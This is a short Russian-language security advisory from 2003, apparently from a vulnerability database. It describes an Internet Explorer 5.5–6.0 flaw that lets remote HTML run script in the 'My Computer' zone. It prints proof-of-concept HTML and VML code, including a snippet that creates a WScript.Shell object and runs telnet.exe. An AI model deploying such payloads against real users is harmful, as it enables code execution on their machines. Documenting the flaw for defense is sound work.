Выполнение произвольного кода сценария в "My Computer" зоне в Internet Explorer

Дата публикации:
06.05.2003
Всего просмотров:
1081
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Microsoft Internet Explorer (IE). Удаленный пользователь может сконструировать HTML, который, при загрузке в браузере целевого пользователя, выполнит произвольный код сценария на системе целевого пользователя в "My Computer" зоне безопасности.

Удаленный пользователь может сконструировать следующий HTML, который может обратиться к Web Folder целевого пользователя:

<body onload=malware() style="behavior: url(#default#httpFolder);">
<script>
function malware(){document.body.navigate
("http://www.microsoft.com");}
</script>
Если Web Folder не существует, во временной папке будет создан файл ошибки 'wecerr.txt' (скриншот здесь http://www.malware.com/behave.png). Содержание файла может быть определенно удаленным пользователем.

Удаленный пользователь может заставить Windows Media Player создать HTML IFRAME, содержащий asf media файл, который загрузит временный локальный файл (mhtml:file://C:\WINDOWS\TEMP\wecerr.txt). Так как Windows Media Player запущен локально, локальный файл будет открыт. HTML код будет открыт как “Temporary Internet File”. Однако эту меру защиты можно обойти, если создать второй wecerr.txt файл (перезаписывая первый) в это время с другим (и злонамеренным) содержанием типа:

 
<xml xmlns:v = "urn:schemas-microsoft-com:vml">

<v:rect id="malware" fillcolor="red" 
style="position:relative;top:1;left:1;width:20;height:20"
onmouseover="javas cript:alert(document.location);var wsh=new 
ActiveXObject('WScript.Shell');wsh.Run('telnet.exe');''">
</v:rect>

</xml>
Поскольку VML фрейм записан поверх первоначального wecerr.txt файла, VML фрем может быть обработан IE. Поскольку извлеченный MHTML файл был первоначально извлечен локально, код будет выполнен в "My Computer" зоне безопасности.

Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0

Ссылки: SILLY BEHAVIOR Part II : Internet Explorer 5.5 - 6.0

или введите имя

CAPTCHA